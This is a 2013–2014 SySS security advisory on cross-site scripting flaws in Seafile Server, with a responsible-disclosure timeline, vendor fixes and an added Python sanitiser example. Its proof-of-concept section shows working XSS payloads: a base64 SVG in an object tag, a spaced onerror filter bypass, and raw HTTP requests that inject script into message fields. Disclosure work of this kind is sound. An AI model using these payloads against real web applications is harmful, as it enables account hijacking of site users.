Advisory - Seafile Server Community

Advisory Seafile Server Community Edition

Advisory ID: SYSS-2013-002
Product: Seafile Server Community Edition
Vendor: Seafile Ltd.
Affected Version(s): 2.0.4 Linux, 2.1.2 Linux, 2.1.3 Linux
Tested Version(s): 2.0.4 Linux, 2.1.2 Linux, 2.1.3 Linux
Vulnerability Type: Cross-Site Scripting
Risk Level: High
Solution Status: Solved
Vendor Notification: 2013-12-16
Solution Date: 2014-01-23
Public Disclosure: 2014-01-23
CVE Reference: Not assigned
Author of Advisory: Marcel Mangold, SySS GmbH, www.syss.de/advisories/
Document Date: 2013-01-23
Document Version: v1.4

 

Overview

The software suffers from persistent and reflected cross-site scripting vulnerabilities.

 

Vulnerability 

Persistent cross-site scripting is possible at least at the following places:

(1) The user wiki page allows any JavaScript code to be entered in version 2.0.4. An attacker can use this for persistent cross-site scripting.

In version 2.1.2 the cross-site scripting must be embedded as base64 into an object tag.

In version 2.1.3 spaces at the right place break the filter mechanism.

After commit 1d75bc079c15e30f6574272e25f1c7c7e5b87969 the issue has to be considered fixed, although validation is still performed as output validation on the client side.

(2) An attacker can send internal messages to other users of the application. The subject field of the messages is vulnerable to persistent cross-site scripting. This way an attacker can have code executed in the context of almost any user of the application. (Fixed in v.2.1.2)

(3) The application displays .svg vector graphics that have been uploaded via the file upload function. This file type may contain JavaScript code, which is executed in a user's browser when the file is displayed. (Fixed in v.2.1.2)

(4) An attacker can send internal messages to other users of the application. The receiver field is vulnerable to reflected cross-site scripting. This is a rather theoretical issue because XSRF tokens are used. (Fixed in v.2.1.3)
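
An added example, not code from the advisory or from Seafile: it contrasts a hypothetical pattern-based filter, which the spaced "onerror =" input from PoC (1) passes through unchanged, with server-side allowlist sanitising built on Python's html.parser. The allowlist, the function names and the shortened <object> input are assumptions made for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Hypothetical pattern filter (not Seafile's code): removes on*= handlers,
# but only when "=" directly follows the attribute name.
def naive_filter(markup):
    return re.sub(r'\son\w+=("[^"]*"|[^\s>]+)', "", markup, flags=re.I)

# Assumed allowlist for a wiki renderer; everything else is dropped.
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(),
           "a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_URL = re.compile(r"^(https?://|/|#)", re.I)
VOID = {"br", "img"}

class Sanitizer(HTMLParser):
    """Re-serialises parsed tokens, keeping only allowlisted tags/attributes."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # <script>, <object>, <svg>, ... never reach the output
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag]:
                continue  # drops onerror, style, data, ...
            if name in URL_ATTRS and not SAFE_URL.match(value.strip()):
                continue  # drops javascript: and data: URLs
            kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is always entity-encoded

def sanitize(markup):
    parser = Sanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)

# Inputs: two strings from the PoC section and a constructed stand-in for
# the base64 <object> payload (placeholder data, not the original blob).
SPACED = '<img src=# onerror =alert("SySS_XSS")>'
SCRIPT = '<script>alert("SySS XSS")</script>'
OBJECT = '<object data=data:image/svg+xml;base64,AAAA type=image/svg+xml></object>'
```

Because the sanitiser works on parsed attributes rather than on the raw string, whitespace around "=" makes no difference to the result, and running it on the server removes the dependence on client-side output filtering.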

 

Proof of Concept (PoC):

(1) Enter the following code into the wiki editor of v2.1.2:

<object data=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3

ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9y

Zy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHN

zIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlN5U1MgWFNTIik7PC9zY3JpcHQ+PC9zdmc+

type=image/svg+xml></object>

Enter the following code into the wiki editor of v2.1.3:

<img src=# onerror =alert("SySS_XSS")>

 

(2) 

Request:

+------------------------------------
POST /message/message_send/ HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de
Accept-Encoding: gzip, deflate
Referer: 127.0.0.1/user/1/msgs/
Cookie: csrftoken=vesdFHfKjk2IIu0sy8suwUzMOk066h1x; sessionid=[...]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 150

csrfmiddlewaretoken=vesdFHfKjk2IIu0sy8suwUzMOk066h1x&mass_msg=<script>alert("SySS XSS")</script>&mass_email=victim%40sample.xy
+------------------------------------

Response:

+------------------------------------
[...]
<div class="txt">
<div class="msg-main">
<div class="msg-hd w100 ovhd">
<a class="author" href="/user/3/msgs/">seafile2</a>
<span class="time">vor 4 Sekunden</span>
</div>
<p class="msg-con"><script>alert("SySS XSS")</script></p>
<span class="say"></span>
</div>
</div>
</li>
[...]
+------------------------------------

 

(4)

Request:

+------------------------------------
POST /message/message_send/?from=all HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/message/list/
Content-Length: 43
Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax[...]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

mass_msg=asdf&mass_email=<script>alert(1)<%2fscript>
+------------------------------------

 

Response:

+------------------------------------
HTTP/1.1 400 BAD REQUEST
Server: gunicorn/0.16.1
Date: Tue, 07 Jan 2014 14:47:01 GMT
Connection: close
Vary: Accept-Language, Cookie
Content-Type: application/json; charset=utf-8
Content-Language: de
Content-Length: 130

{"html": "", "error": ["Senden der Nachricht an <script>alert(1)</script> fehlgeschlagen, da der Benutzer nicht gefunden wurde."]}
+------------------------------------

 

Solution:

(1) Update to version 2.1.4 - vendor fixed the issue

(2) Update to version 2.1.2 - vendor fixed the issue

(3) Update to version 2.1.2 - vendor fixed the issue

(4) Update to version 2.1.3 - vendor fixed the issue

 

Disclosure Timeline:

2013-12-02 - Vulnerability discovered

2013-12-16 - Vulnerability reported to developer

2013-12-30 - Patches for issues (2) and (3) committed to github

2014-01-07 - Vulnerability status reported to developer

2014-01-08 - Patches for issues committed to github

2014-01-11 - Received email from developer that new version 2.1.3 came out with issues fixed

2014-01-13 - Verified issue (4) is fixed

2014-01-13 - Vulnerability status reported to developer

2014-01-14 - Patch for issue (1) committed to github while validation is still done using output filtering on the client side (commit 1d75bc079c15e30f6574272e25f1c7c7e5b87969)

2014-01-23 - Version 2.1.4 published - this update solves all issues mentioned in this document 

 

References:

[1] SySS GmbH, SYSS-2013-002 - www.syss.de/advisories/SYSS-2013-002 - Persistent Cross-Site Scripting (XSS) in Seafile 2.0.4 Server

[2] SySS GmbH, SySS Responsible Disclosure Policy 

 

Credits:

Security vulnerability found by Responsible Hacker of the SySS GmbH

E-Mail: marcel.mangold@syss.de

Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc

Key ID: AC15E5BE

Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE

 

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. 

Details of this security advisory may be updated in order to provide as accurate information as possible.

The latest version of this security advisory is available on the SySS Web site [1].

 

Copyright:

Creative Commons - Attribution (by) - Version 3.0

URL: creativecommons.org/licenses/by/3.0/deed.en

Your direct contact to SySS: +49 (0)7071 - 40 78 56-0 or anfrage@syss.de | In urgent cases outside business hours: +49 (0)7071 - 40 78 56-99

Framework agreement customers, please dial the on-call number provided to you
